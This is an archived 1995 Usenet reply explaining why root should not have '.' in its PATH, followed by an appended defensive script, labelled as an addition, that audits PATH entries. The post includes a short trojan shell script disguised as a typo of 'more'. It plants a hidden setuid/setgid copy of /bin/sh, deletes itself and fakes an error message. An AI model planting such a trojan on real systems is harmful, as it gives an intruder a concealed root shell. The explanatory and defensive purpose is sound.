*BSD News Article 48193



Newsgroups: comp.unix.bsd.misc
Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!news.sprintlink.net!howland.reston.ans.net!swrinde!news.uh.edu!uuneo.neosoft.com!nmtigw!peter
From: peter@nmti.com (Peter da Silva)
Subject: Re: running as root with . in path Was: MacBSD ?
Message-ID: <id.44CM1.5RD@nmti.com>
Sender: peter@nmti.com (peter da silva)
Organization: Network/development platform support, NMTI
References: <3vhdsc$a1q@rigel.pixi.com> <id.TO2M1.IPE@nmti.com> <MARKG.95Aug8220219@kelly.teleport.com>
Date: Wed, 9 Aug 1995 14:40:41 GMT
Lines: 22

In article <MARKG.95Aug8220219@kelly.teleport.com>,
Mark C. Gay <markg@teleport.com> wrote:
> Any way to suppress it?

You have the source code, don't you?

> Also, could you give a little more detail about how this kind of 
> security glitch would work?  Am I correct in assuming that the file
> mroe might perhaps contain a rather interesting shell script?

Something like this would do it:

	#!/bin/sh
	cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 &&
	chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 &&
	rm mroe &
	echo 'mroe: Command not found.'
-- 
Peter da Silva    (NIC: PJD2)                             `-_-'
Bailey Network Management                                  'U`
1601 Industrial Blvd.     Sugar Land, TX  77478  USA
+1 713 274 5180                                "Har du kramat din varg idag?"
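
A defensive counterpart to the script above, as an added example that is not part of the original post: a POSIX sh check that flags the PATH entries through which a file like mroe becomes reachable ('.', empty components, relative or world-writable directories). The function name audit_path and the sample PATH string are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a PATH string for entries
# that let a mistyped command run a file from an untrusted directory.
# audit_path is a hypothetical helper name.

audit_path() {
    path_to_check=${1-$PATH}    # $1: PATH string; defaults to current $PATH
    findings=0

    # A leading, trailing or doubled colon is an empty component, which the
    # shell searches as the current directory (an empty string is flagged too).
    case ":$path_to_check:" in
        *::*)
            echo "UNSAFE: empty component (implicit current directory)"
            findings=$((findings + 1)) ;;
    esac

    old_ifs=$IFS
    IFS=:
    set -f                      # split on ':' only, no glob expansion
    for dir in $path_to_check; do
        case $dir in
            "") ;;              # already reported above
            .)
                echo "UNSAFE: explicit '.' entry"
                findings=$((findings + 1)) ;;
            /*)
                # "$dir/." follows a symlinked directory to its target.
                if [ -d "$dir" ] &&
                   [ -n "$(find "$dir/." -prune -perm -0002 2>/dev/null)" ]; then
                    echo "UNSAFE: world-writable directory '$dir'"
                    findings=$((findings + 1))
                fi ;;
            *)
                echo "UNSAFE: relative entry '$dir'"
                findings=$((findings + 1)) ;;
        esac
    done
    set +f
    IFS=$old_ifs

    [ "$findings" -eq 0 ]       # exit status 0 only when nothing was flagged
}

# Constructed sample input: a root PATH with '.' first and a trailing colon.
audit_path ".:/usr/bin:/bin:" || echo "PATH needs fixing"
```

Run it against root's actual environment with `audit_path "$PATH"`; a non-zero exit status means at least one entry was flagged.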